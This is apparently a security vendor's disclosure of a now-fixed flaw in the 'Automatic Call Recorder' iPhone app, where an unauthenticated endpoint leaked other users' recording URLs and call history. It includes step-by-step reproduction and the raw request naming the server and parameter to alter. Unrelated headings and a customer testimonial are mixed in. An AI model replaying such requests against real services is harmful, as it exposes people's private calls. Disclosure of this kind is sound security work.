Uber Confirms Account Takeover Vulnerability Found By Forbes 30 Under 30 Honoree Old

About Google Cloud Service Accounts

This vulnerability was responsibly disclosed by Anand Prakash, PingSafe, and is now fixed. Special thanks to Zack Whittaker from TechCrunch for helping us with the entire disclosure process and helping in getting this critical vulnerability fixed.

The “Automatic call recorder” application is one of the popular applications used by iPhone users to record their calls.

The app is among top-grossing in the Business category of App Store currently #15 in the downloads in the Business Category worldwide.

Summary

We discovered this vulnerability while doing open-source intelligence across mobile applications in different categories. PingSafe decompiled the IPA file and figured out S3 buckets, hostnames, and other sensitive details used by the application.

The vulnerability allowed any malicious actor to listen to any user’s call recording from the cloud storage bucket of the application and an unauthenticated API endpoint that leaked the cloud storage URL of the victim’s data.

Cloud Risk Description

This vulnerability existed in the “/fetch-sinch-recordings.php” API endpoint of the “Automatic Call Recorder” application. An attacker can pass another user’s number in the recordings request and the API will respond with the recording url of the storage bucket without any authentication. It also leaks the victim’s entire call history and the numbers on which calls were made.

How Does PingSafe Help?

1. Install the “Automatic Call Recorder” application on your phone.
2. Intercept application’s traffic in Burp Suite/Zap Proxy.
3. You will observe a POST API request to 167.88.123.157:80/fetch-sinch-recordings.php change UserID to victim’s phone number with country code.
4. Response will have an S3 URL for the recording and other sensitive details.

Reference – An attacker can pass another user’s number in the recordings request

Vulnerable Request

POST /fetch-sinch-recordings.php HTTP/1.1
Host: 167.88.123.157:80
Content-Type: application/json
Connection: close
Accept: */*
User-Agent: CallRecorder/2.25 (com.arun.callrecorderadvanced; build:1; iOS 14.4.0) Alamofire/4.7.3
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Content-Length: 72
Accept-Encoding: gzip, deflate
{
 “UserID”: “xxxxxx”,
 “AppID”: “xxx”
}

“PingSafe is an excellent solution for dynamic and real-time monitoring of all the multi-cloud workloads. The flexibility of configuration and the ease of maintenance is a big plus.”

Subhajit Deb

Global CISO, Dr. Reddy’s